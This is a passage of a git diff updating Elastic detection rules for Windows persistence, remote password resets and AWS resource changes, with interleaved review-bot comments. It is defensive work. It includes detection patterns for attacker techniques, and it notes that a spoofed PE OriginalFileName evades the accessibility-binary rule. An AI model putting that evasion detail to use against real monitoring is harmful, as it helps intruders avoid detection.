[here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features\nbinaries' original file names, which is likely a custom binary deployed by the attacker.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive\n(B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) 
for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -75,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_cluster_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_cluster_creation.json index 864827b99f31e..b7776e3a04bae 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_cluster_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_cluster_creation.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Cluster Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(CreateDBCluster or CreateGlobalCluster) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/create-db-cluster.html", 
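Review bot: The rewritten `note` still tells the analyst that a non-matching `process.pe.original_file_name` is "likely a custom binary deployed by the attacker", while the query's own trailing comment concedes that a rogue binary carrying a spoofed OriginalFileName bypasses the rule until the commented `process.code_signature` clause can be enabled. Since the note is being rewritten in this hunk, carry that caveat into the investigation steps, e.g. `- Check the binary's code signature (subject name and trust status): this rule keys on the PE OriginalFileName, which an attacker can set freely, so a signed-by-Microsoft check is the stronger test.` It would also be worth stating in `setup` that the signature clause is disabled pending data-source support, so operators on Elastic Agent can enable it themselves.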
@@ -23,8 +23,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/create-global-cluster.html", "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateGlobalCluster.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -62,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_group_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_group_creation.json index f5a8b12e5485a..ad308ec83690f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_group_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_group_creation.json 
@@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Security Group Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:CreateDBSecurityGroup and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBSecurityGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "378f9024-8a0c-46a5-aa08-ce147ac73a4e", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_instance_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_instance_creation.json index 0bc967072e0c9..8638b22ccf16e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_instance_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_instance_creation.json 
@@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Instance Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:CreateDBInstance and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBInstance.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f30f3443-4fbb-4c27-ab89-c3ad49d62315", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -30,7 +60,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Persistence" ], "threat": [ { @@ -45,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_redshift_instance_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_redshift_instance_creation.json index 305a951c54367..5642aa8ef2f9f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_redshift_instance_creation.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_redshift_instance_creation.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Redshift Cluster Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:redshift.amazonaws.com and event.action:CreateCluster and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/redshift/latest/APIReference/API_CreateCluster.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "015cca13-8832-49ac-a01b-a396114809f6", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,7 +59,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Persistence" ], "threat": [ { @@ -44,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_registry_uncommon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_registry_uncommon.json index ed8aa95d06696..4060df4d58bb1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_registry_uncommon.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_registry_uncommon.json @@ -14,6 +14,28 @@ "references": [ "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "54902e45-3467-49a4-8abc-529f2c8cfb80", "severity": "medium", @@ -67,5 +89,5 @@ "timeline_title": "Comprehensive Registry Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_remote_password_reset.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_remote_password_reset.json index 4c7390210eb37..8d1263479c15a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_remote_password_reset.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_remote_password_reset.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies an attempt to reset an account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", + "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", "false_positives": [ "Legitimate remote account administration." ], 
@@ -14,12 +14,59 @@ "language": "eql", "license": "Elastic License v2", "name": "Account Password Reset Remotely", - "query": "sequence by host.id with maxspan=5m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\"] by winlog.event_data.SubjectLogonId\n", + "query": "sequence by host.id with maxspan=5m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : \"S-1-5-21-*-500\"\n )\n ] by winlog.event_data.SubjectLogonId\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + 
"ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", "severity": "medium", @@ -48,5 +95,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transfer_lock_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transfer_lock_disabled.json index 61ceebb7615f5..91e3115ade304 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transfer_lock_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transfer_lock_disabled.json 
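Review bot: The tuning guidance ("duplicate the rule and add your own naming convention") lives only in an EQL comment inside `query`, whereas the other rules in this commit move operator guidance into the new `setup` field shown in the rule details, and no `setup` is added here. Suggest `"setup": "This rule is scoped to TargetUserName values matching common privileged naming patterns (Admin, super, SVC, DC0, service, DMZ, ADM) and to the built-in Administrator (RID 500); duplicate the rule and replace the patterns with your own privileged-account naming convention, as accounts outside these patterns will not alert."` Separately, EQL's `:` operator matches case-insensitively, so `"*Admin*"` is already covered by `"*ADM*"` and one of the two can be dropped without changing behaviour.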
@@ -16,14 +16,44 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS Route 53 Domain Transfer Lock Disabled",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:aws.cloudtrail and event.provider:route53.amazonaws.com and event.action:DisableDomainTransferLock and event.outcome:success\n",
 "references": [
 "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html",
 "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "12051077-0124-4394-9522-8f4f4db1d674",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -61,5 +91,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transferred_to_another_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transferred_to_another_account.json
index 8485e1a96e685..00c219ecd298d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transferred_to_another_account.json
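Review bot: `note` is rewritten to the empty string (`+ "note": "",`) rather than removed, here and in the matching hunks of the other four Route 53 / route table rules on this page; if the rule UI renders an investigation guide whenever the key is present, that shows an empty section. Dropping the key once its content has moved to `setup` seems cleaner than keeping a placeholder, unless the exporter that produces these files requires it to be present.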
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transferred_to_another_account.json
@@ -16,13 +16,43 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS Route 53 Domain Transferred to Another Account",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:aws.cloudtrail and event.provider:route53.amazonaws.com and event.action:TransferDomainToAnotherAwsAccount and event.outcome:success\n",
 "references": [
 "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "2045567e-b0af-444a-8c0b-0b6e2dae9e13",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -60,5 +90,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_hosted_zone_associated_with_a_vpc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_hosted_zone_associated_with_a_vpc.json
index 93b8da585c9ff..4f1041ef2a441 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_hosted_zone_associated_with_a_vpc.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_hosted_zone_associated_with_a_vpc.json
@@ -15,13 +15,43 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS Route53 private hosted zone associated with a VPC",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:aws.cloudtrail and event.provider:route53.amazonaws.com and event.action:AssociateVPCWithHostedZone and \nevent.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:aws.cloudtrail and event.provider:route53.amazonaws.com and event.action:AssociateVPCWithHostedZone and\nevent.outcome:success\n",
 "references": [
 "https://docs.aws.amazon.com/Route53/latest/APIReference/API_AssociateVPCWithHostedZone.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "e3c27562-709a-42bd-82f2-3ed926cced19",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -50,5 +80,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_created.json
index c9127d73cae7a..09616447f80ca 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_created.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_created.json
@@ -16,15 +16,45 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS Route Table Created",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:(CreateRoute or CreateRouteTable) and \nevent.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:(CreateRoute or CreateRouteTable) and\nevent.outcome:success\n",
 "references": [
 "https://docs.datadoghq.com/security_platform/default_rules/aws-ec2-route-table-modified/",
 "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRoute.html",
 "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRouteTable"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "e12c0318-99b1-44f2-830c-3a38a43207ca",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -32,7 +62,8 @@
 "AWS",
 "Continuous Monitoring",
 "SecOps",
- "Network Security"
+ "Network Security",
+ "Persistence"
 ],
 "threat": [
 {
@@ -47,5 +78,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_modified_or_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_modified_or_deleted.json
index c7acbed8da482..3fd0b12476ed9 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_modified_or_deleted.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_table_modified_or_deleted.json
@@ -16,7 +16,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "AWS Route Table Modified or Deleted",
- "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:(ReplaceRoute or ReplaceRouteTableAssociation or\nDeleteRouteTable or DeleteRoute or DisassociateRouteTable) and event.outcome:success\n",
 "references": [
 "https://github.com/easttimor/aws-incident-response#network-routing",
@@ -27,8 +27,38 @@
 "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteRoute.html",
 "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisassociateRouteTable.html"
 ],
+ "related_integrations": [
+ {
+ "integration": "cloudtrail",
+ "package": "aws",
+ "version": "1.10.2"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "e7cd5982-17c8-4959-874c-633acde7d426",
+ "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -36,7 +66,8 @@
 "AWS",
 "Continuous Monitoring",
 "SecOps",
- "Network Security"
+ "Network Security",
+ "Persistence"
 ],
 "threat": [
 {
@@ -51,5 +82,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_run_key_and_startup_broad.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_run_key_and_startup_broad.json
index 6e1705cda69dc..817f1c010fa30 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_run_key_and_startup_broad.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_run_key_and_startup_broad.json
@@ -11,6 +11,38 @@ "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", "query": "registry where registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\", \n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\", \n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\", \n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\", \n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\", \n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\", \n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\", \n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", 